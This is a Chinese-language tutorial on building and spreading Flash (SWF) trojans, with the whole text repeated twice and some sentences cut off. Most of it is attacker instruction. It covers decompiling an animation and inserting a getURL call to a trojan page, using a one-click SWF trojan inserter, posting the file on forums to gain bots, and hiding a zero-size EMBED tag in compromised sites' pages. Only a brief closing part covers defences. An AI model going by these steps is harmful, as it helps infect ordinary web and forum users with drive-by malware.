在网站上观看Flash动画,接收 到“好友”发来的一张Flash贺卡,甚至于一 个QQ魔法表情,一不留神就中了一个木 马!Flash动画木马可以说是无处不在,攻 击威力和覆盖面极其广。许多朋友一定想 了解Flash木马的原理,想知道攻击者是 如何在SWF中插入木马的呢?我们应该怎 么样来防范Flash木马呢?
,,,,,制作方法一,,,,,
Flash动画木马的原理,是在网页 中显示或本地直接播放Flash动画木马 时,让Flash自动打开一个网址,而该网 址就是我们预先制作好的一个木马网页。 也就是说,在制作网页木马前,我们首先 需要制作好一个网页木马,并将它放置到 某个网站上去。
另外,我们还需要准备一个比较 吸引人的Flash动画文件“MM热舞.swf”, 以及Flash动画反编译工具“闪客精灵”,编 辑工具Macromedia Flash MX。
现在虽然有了许多各种各样的 Flash动画木马制作工具,但是为了了解 Flash动画木马的最基本原理,有必要从 头开始用最原始的方法制作一个Flash木
首先我们需要将要插入网页木马 的Flash动画文件“MM热舞.swf”,反编译 成可编辑的.fla格式。运行“闪客精灵”,点 击菜单“文件”→“快速打开”命令,指 定“MM热舞.swf”文件将其导入。
工具栏上的“导出FLA”命令,将动画导出 为“MM热舞.fla”文件。
然后运行Flash动画编辑器 Macromedia Flash MX,点击菜单“文 件”→“打开”,调入刚才保存的fla文件。
开界面下方的“动作/帧”栏,再展开“动 作”→“浏览器/网络”项,点击其中 的“getURL”命令,在右边窗口中 的“URL”里面输入我们的网页木马地址;窗 口方式为“_blank”;“变量”设置为“使用GET 方式发送”,在下方的代码窗口中将出 现“getURL("http://网页木马地址", "_blank", "GET");”。
设置完毕后保存文件,并点击菜 单“文件”→“发布”命令,将动画重新导出为 SWF格式。用IE浏览器打开刚才生成的 Flash动画木马,可以看到随着Flash动画 打开播放时,自动弹出一个浏览器窗口, 里面将会显示我们的木马网页。
,,,,,制作方法二,,,,,
上面插入木马的过程比较麻烦, 下面我们介绍一个简单的方法,也正是这 些简单的工具使得Flash木马在网上随处
运行SWF木马插入器,点击界面 中的“选择”按钮,浏览指定要插入木马的 SWF文件;在“插入代码”中输入木马网页的 地址;切记不要勾选下面的“只解压”项。设 置完毕后,点击“给我插”按钮,程序提示 开始插入木马网页。显示成功信息后,关 闭程序,用IE打开生成的动画,可以看到 自动跳转到木马网页去了。
看到上面的步骤了吧,生成一个 Flash动画木马是不是很简单? 那么生成的 Flash木马该如何应用呢?只要我们将Flash 上传到某个网站中,就可以通过论坛或网 站之类的直接利用了。
大部分的论坛中都可以发来Flash 动画的帖子,利用论坛发帖,攻击者可以 快速获得大量的肉鸡。
论坛为例,在发帖或回复时,点击编辑窗 口上方的“插入Flash动画”按钮,设置 Flash窗口大小,使用默认设置后,要求 输入Flash的URL地址。确定后,可以看到 编辑窗口中显示的代码 为““(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)””,这就是完整的 Flash播放代码了,不同的论坛代码是不
攻击者入侵了某个大的网站之 后,很可能在网站首页挂马,使用普通方 式挂马会被管理员发觉,但是挂上Flash 木马的话,是很难查杀的。攻击者可能在 网页中插入如下代码:
“《EMBED src=http://网页木马地 址/木马.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》”,其中的《》改
这里的参数“width=0 height=0”表 示,Flash播放窗口为零,也就是不显示 Flash播放窗口。其它用户浏览网页时, 就会莫名其妙的弹出一个木马网页窗口。
,,,,,,防御方法,,,,,,
其实不管Flash木马有多么的巧 妙,最终都是要跳转到木马网页去的,也 就是说我们最终要防范的还是网页木马。 了解了思路,对于Flash动画木马就简单
首先,要开启Windows XP SP2 的窗口拦截窗口功能,或安装其它防弹出 窗口的插件。如果那个漏网之鱼,莫名其 妙弹出的网页窗口要及时的关闭。
一定要在上网浏览时开启杀毒软件的网页 监控功能,只要网页木马在后台一下载到 本地硬盘,就会被杀毒软件查杀,这样就 万事无忧了!
,,,,,,,,,,,,,,,,本人一对代码进行处理,,,,
,,,,,制作方法一,,,,,
Flash动画木马的原理,是在网页 中显示或本地直接播放Flash动画木马 时,让Flash自动打开一个网址,而该网 址就是我们预先制作好的一个木马网页。 也就是说,在制作网页木马前,我们首先 需要制作好一个网页木马,并将它放置到 某个网站上去。
另外,我们还需要准备一个比较 吸引人的Flash动画文件“MM热舞.swf”, 以及Flash动画反编译工具“闪客精灵”,编 辑工具Macromedia Flash MX。
现在虽然有了许多各种各样的 Flash动画木马制作工具,但是为了了解 Flash动画木马的最基本原理,有必要从 头开始用最原始的方法制作一个Flash木
首先我们需要将要插入网页木马 的Flash动画文件“MM热舞.swf”,反编译 成可编辑的.fla格式。运行“闪客精灵”,点 击菜单“文件”→“快速打开”命令,指 定“MM热舞.swf”文件将其导入。
工具栏上的“导出FLA”命令,将动画导出 为“MM热舞.fla”文件。
然后运行Flash动画编辑器 Macromedia Flash MX,点击菜单“文 件”→“打开”,调入刚才保存的fla文件。
开界面下方的“动作/帧”栏,再展开“动 作”→“浏览器/网络”项,点击其中 的“getURL”命令,在右边窗口中 的“URL”里面输入我们的网页木马地址;窗 口方式为“_blank”;“变量”设置为“使用GET 方式发送”,在下方的代码窗口中将出 现“getURL("http://网页木马地址", "_blank", "GET");”。
设置完毕后保存文件,并点击菜 单“文件”→“发布”命令,将动画重新导出为 SWF格式。用IE浏览器打开刚才生成的 Flash动画木马,可以看到随着Flash动画 打开播放时,自动弹出一个浏览器窗口, 里面将会显示我们的木马网页。
,,,,,制作方法二,,,,,
上面插入木马的过程比较麻烦, 下面我们介绍一个简单的方法,也正是这 些简单的工具使得Flash木马在网上随处
运行SWF木马插入器,点击界面 中的“选择”按钮,浏览指定要插入木马的 SWF文件;在“插入代码”中输入木马网页的 地址;切记不要勾选下面的“只解压”项。设 置完毕后,点击“给我插”按钮,程序提示 开始插入木马网页。显示成功信息后,关 闭程序,用IE打开生成的动画,可以看到 自动跳转到木马网页去了。
看到上面的步骤了吧,生成一个 Flash动画木马是不是很简单? 那么生成的 Flash木马该如何应用呢?只要我们将Flash 上传到某个网站中,就可以通过论坛或网 站之类的直接利用了。
大部分的论坛中都可以发来Flash 动画的帖子,利用论坛发帖,攻击者可以 快速获得大量的肉鸡。
论坛为例,在发帖或回复时,点击编辑窗 口上方的“插入Flash动画”按钮,设置 Flash窗口大小,使用默认设置后,要求 输入Flash的URL地址。确定后,可以看到 编辑窗口中显示的代码 为““(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)””,这就是完整的 Flash播放代码了,不同的论坛代码是不
攻击者入侵了某个大的网站之 后,很可能在网站首页挂马,使用普通方 式挂马会被管理员发觉,但是挂上Flash 木马的话,是很难查杀的。攻击者可能在 网页中插入如下代码:
“《EMBED src=http://网页木马地 址/木马.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》”,其中的《》改
这里的参数“width=0 height=0”表 示,Flash播放窗口为零,也就是不显示 Flash播放窗口。其它用户浏览网页时, 就会莫名其妙的弹出一个木马网页窗口。
,,,,,,防御方法,,,,,,
其实不管Flash木马有多么的巧 妙,最终都是要跳转到木马网页去的,也 就是说我们最终要防范的还是网页木马。 了解了思路,对于Flash动画木马就简单
首先,要开启Windows XP SP2 的窗口拦截窗口功能,或安装其它防弹出 窗口的插件。如果那个漏网之鱼,莫名其 妙弹出的网页窗口要及时的关闭。
一定要在上网浏览时开启杀毒软件的网页 监控功能,只要网页木马在后台一下载到 本地硬盘,就会被杀毒软件查杀,这样就 万事无忧了!
,,,,,,,,,,,,,,,,本人一对代码进行处理,,,,
